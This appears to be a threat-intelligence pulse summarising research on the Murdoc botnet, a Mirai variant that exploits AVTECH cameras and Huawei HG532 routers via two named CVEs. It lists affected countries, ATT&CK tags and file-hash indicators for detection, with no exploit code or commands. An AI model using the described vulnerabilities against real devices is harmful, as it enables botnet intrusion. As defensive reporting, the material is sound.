The Qualys Threat Research Unit has uncovered a large-scale operation within the Mirai campaign, dubbed Murdoc Botnet. This variant exploits vulnerabilities in AVTECH Cameras and Huawei HG532 routers, demonstrating enhanced capabilities to compromise devices and establish expansive botnet networks. The campaign, which began in July 2024, uses ELF file and Shell Script execution to deploy the botnet sample. Over 1300 IPs were found active, with 100+ distinct sets of servers distributing the malware. The botnet targets vulnerable devices using existing exploits like CVE-2024-7029 and CVE-2017-17215. Affected countries include Malaysia, Thailand, Mexico, and Indonesia. The malware uses shell scripts to fetch, execute, and remove payloads on compromised devices. Author: AlienVault
Related Tags:
Malaysia
Thailand
Mexico
indonesia
Mirai
T1133
IoT
T1498
botnet
Associated Indicators:
34881CA6CFF31098ED669FC379CA8B9D319AAB5F14E0FB7D0B107A20FF1130E9
76EBD9695AEF87CC975D63B3A7A9ECC7D31BCD53A29E70BA97464A61E102CF52
C3B9FFCA2B7F5C9FDEFB39D6C13D657769EC140EFD4513842DBC68ADBAD99EFA
5234086AFF9CD88B6B25FA068A860E91F5FAF8D457DF60CB207B329C69C27C0D
99A0AB2A04A9CAE3666A4BAF52D35B4C623F1F41B5EB1519156EBE02D2AFECEB
F5AA93311D8DCDE50D87EC010274FDD7A7653EED51264F0E2E648403EC4177D0
69405C640E224C981555509BD088EF759C584228F989E46D89E83483F9C2E4B7
6B8EF346DF6C002AABA3BCF91BED0CE8078A76E4600BCF86C08A6EEF80D4C77A
C0AE1EB249705F61D45CA747C91C02A411557A28792F4064C1D647ABB580BC10